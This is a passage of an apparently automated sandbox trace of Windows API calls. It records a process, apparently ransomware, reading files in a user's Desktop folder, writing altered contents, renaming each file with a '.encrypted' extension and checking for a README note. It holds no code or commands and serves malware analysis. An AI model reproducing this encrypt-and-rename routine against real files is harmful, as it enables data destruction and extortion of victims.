lpOverlapped=0x0) returned 1 [0153.797] CloseHandle (hObject=0x4d0) returned 1 [0153.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0153.820] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0153.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv", lpFilePart=0x0) returned 0x41 [0153.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0153.820] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\lc0nziclr0n.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.821] GetFileType (hFile=0x4d0) returned 0x1 [0153.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0153.822] GetFileType (hFile=0x4d0) returned 0x1 [0153.822] WriteFile (in: hFile=0x4d0, lpBuffer=0x4163ac0*, nNumberOfBytesToWrite=0x164a0, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x4163ac0*, lpNumberOfBytesWritten=0x2ee844*=0x164a0, lpOverlapped=0x0) returned 1 [0153.824] CloseHandle (hObject=0x4d0) returned 1 [0153.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv", lpFilePart=0x0) returned 0x41 [0153.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv.encrypted", lpFilePart=0x0) returned 0x4b [0153.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0153.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\lc0nziclr0n.csv"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90103ca0, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0x64e46200, ftLastAccessTime.dwHighDateTime=0x1d5df34, ftLastWriteTime.dwLowDateTime=0x42a7fa20, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x164a0)) returned 1 [0153.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0153.826] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\lc0nziclr0n.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\lc0nziclr0n.csv.encrypted")) returned 1 [0153.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg", lpFilePart=0x0) returned 0x47 [0153.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0153.827] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\xcg2yaxku2c8atvq5.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.829] GetFileType (hFile=0x4d0) returned 0x1 [0153.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0153.829] GetFileType (hFile=0x4d0) returned 0x1 [0153.829] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0xa1e [0153.829] ReadFile (in: hFile=0x4d0, lpBuffer=0x23ecc9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x23ecc9c*, lpNumberOfBytesRead=0x2ee854*=0xa1e, lpOverlapped=0x0) returned 1 [0153.830] CloseHandle (hObject=0x4d0) returned 1 [0153.845] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0153.845] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0153.846] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg", lpFilePart=0x0) returned 0x47 [0153.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0153.846] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\xcg2yaxku2c8atvq5.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.846] GetFileType (hFile=0x4d0) returned 0x1 [0153.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0153.847] GetFileType (hFile=0x4d0) returned 0x1 [0153.847] WriteFile (in: hFile=0x4d0, lpBuffer=0x243df58*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x2ee818, lpOverlapped=0x0 | out: lpBuffer=0x243df58*, lpNumberOfBytesWritten=0x2ee818*=0xa20, lpOverlapped=0x0) returned 1 [0153.847] CloseHandle (hObject=0x4d0) returned 1 [0153.848] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg", lpFilePart=0x0) returned 0x47 [0153.848] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg.encrypted", lpFilePart=0x0) returned 0x51 [0153.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0153.849] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\xcg2yaxku2c8atvq5.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ccd9ff0, ftCreationTime.dwHighDateTime=0x1d5da7e, ftLastAccessTime.dwLowDateTime=0x65bbe1a0, ftLastAccessTime.dwHighDateTime=0x1d5d7b2, ftLastWriteTime.dwLowDateTime=0x42aa5b80, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xa20)) returned 1 [0153.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0153.849] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\xcg2yaxku2c8atvq5.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\xCg2yAxkU2C8AtVq5.jpg.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\xcg2yaxku2c8atvq5.jpg.encrypted")) returned 1 [0153.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi", lpFilePart=0x0) returned 0x41 [0153.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0153.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\y9h9zrthfap.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.851] GetFileType (hFile=0x4d0) returned 0x1 [0153.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0153.852] GetFileType (hFile=0x4d0) returned 0x1 [0153.852] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0x17f3d [0153.852] ReadFile (in: hFile=0x4d0, lpBuffer=0x4179f80, nNumberOfBytesToRead=0x17f3d, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x4179f80*, lpNumberOfBytesRead=0x2ee854*=0x17f3d, lpOverlapped=0x0) returned 1 [0153.855] CloseHandle (hObject=0x4d0) returned 1 [0153.873] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0153.873] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0153.873] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi", lpFilePart=0x0) returned 0x41 [0153.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0153.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\y9h9zrthfap.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.875] GetFileType (hFile=0x4d0) returned 0x1 [0153.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0153.875] GetFileType (hFile=0x4d0) returned 0x1 [0153.875] WriteFile (in: hFile=0x4d0, lpBuffer=0x5221038*, nNumberOfBytesToWrite=0x17f40, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x5221038*, lpNumberOfBytesWritten=0x2ee844*=0x17f40, lpOverlapped=0x0) returned 1 [0153.877] CloseHandle (hObject=0x4d0) returned 1 [0153.878] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi", lpFilePart=0x0) returned 0x41 [0153.878] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi.encrypted", lpFilePart=0x0) returned 0x4b [0153.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0153.879] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\y9h9zrthfap.avi"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7686a550, ftCreationTime.dwHighDateTime=0x1d5e677, ftLastAccessTime.dwLowDateTime=0x98613e70, ftLastAccessTime.dwHighDateTime=0x1d5e464, ftLastWriteTime.dwLowDateTime=0x42af1e40, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x17f40)) returned 1 [0153.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0153.879] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\y9h9zrthfap.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\y9h9zrThfAP.avi.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\y9h9zrthfap.avi.encrypted")) returned 1 [0153.880] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp", lpFilePart=0x0) returned 0x45 [0153.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0153.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\ye6nlxyvra7xela.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.880] GetFileType (hFile=0x4d0) returned 0x1 [0153.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0153.880] GetFileType (hFile=0x4d0) returned 0x1 [0153.880] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0x1424d [0153.880] ReadFile (in: hFile=0x4d0, lpBuffer=0x248c5b0, nNumberOfBytesToRead=0x1424d, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x248c5b0*, lpNumberOfBytesRead=0x2ee854*=0x1424d, lpOverlapped=0x0) returned 1 [0153.925] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0153.926] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0153.926] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp", lpFilePart=0x0) returned 0x45 [0153.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0153.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\ye6nlxyvra7xela.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.927] GetFileType (hFile=0x4d0) returned 0x1 [0153.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0153.927] GetFileType (hFile=0x4d0) returned 0x1 [0153.927] WriteFile (in: hFile=0x4d0, lpBuffer=0x230c950*, nNumberOfBytesToWrite=0x14250, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x230c950*, lpNumberOfBytesWritten=0x2ee844*=0x14250, lpOverlapped=0x0) returned 1 [0153.929] CloseHandle (hObject=0x4d0) returned 1 [0153.931] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp", lpFilePart=0x0) returned 0x45 [0153.931] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp.encrypted", lpFilePart=0x0) returned 0x4f [0153.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0153.931] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\ye6nlxyvra7xela.bmp"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4451210, ftCreationTime.dwHighDateTime=0x1d5e40c, ftLastAccessTime.dwLowDateTime=0x2ecfd650, ftLastAccessTime.dwHighDateTime=0x1d5ddcb, ftLastWriteTime.dwLowDateTime=0x42b64260, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x14250)) returned 1 [0153.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0153.931] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\ye6nlxyvra7xela.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\Ye6NLXYVra7xela.bmp.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\ye6nlxyvra7xela.bmp.encrypted")) returned 1 [0153.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0153.932] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5", lpFilePart=0x0) returned 0x43 [0153.932] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\", lpFilePart=0x0) returned 0x44 [0153.933] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\F4ijCytc3cL6KrfK5\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf60d0be0, ftCreationTime.dwHighDateTime=0x1d5e2f6, ftLastAccessTime.dwLowDateTime=0xe1268c60, ftLastAccessTime.dwHighDateTime=0x1d5e4ae, ftLastWriteTime.dwLowDateTime=0xe1268c60, ftLastWriteTime.dwHighDateTime=0x1d5e4ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee530 [0153.934] FindNextFileW (in: hFindFile=0x94ee530, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf60d0be0, ftCreationTime.dwHighDateTime=0x1d5e2f6, ftLastAccessTime.dwLowDateTime=0xe1268c60, ftLastAccessTime.dwHighDateTime=0x1d5e4ae, ftLastWriteTime.dwLowDateTime=0xe1268c60, ftLastWriteTime.dwHighDateTime=0x1d5e4ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.934] FindNextFileW (in: hFindFile=0x94ee530, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45378230, ftCreationTime.dwHighDateTime=0x1d5e2a3, ftLastAccessTime.dwLowDateTime=0xa56396b0, ftLastAccessTime.dwHighDateTime=0x1d5e5bb, ftLastWriteTime.dwLowDateTime=0xa56396b0, ftLastWriteTime.dwHighDateTime=0x1d5e5bb, nFileSizeHigh=0x0, nFileSizeLow=0x1121b, dwReserved0=0x0, dwReserved1=0x0, cFileName="8yFcm4n_T68I.rtf", cAlternateFileName="8YFCM4~1.RTF")) returned 1 [0153.934] FindNextFileW (in: hFindFile=0x94ee530, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e3a53e0, ftCreationTime.dwHighDateTime=0x1d5e4fa, ftLastAccessTime.dwLowDateTime=0x1239a4a0, ftLastAccessTime.dwHighDateTime=0x1d5e0f3, ftLastWriteTime.dwLowDateTime=0x1239a4a0, ftLastWriteTime.dwHighDateTime=0x1d5e0f3, nFileSizeHigh=0x0, nFileSizeLow=0x16a59, dwReserved0=0x0, dwReserved1=0x0, cFileName="IUkul4HRK.avi", cAlternateFileName="IUKUL4~1.AVI")) returned 1 [0153.935] FindNextFileW (in: hFindFile=0x94ee530, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8144860, 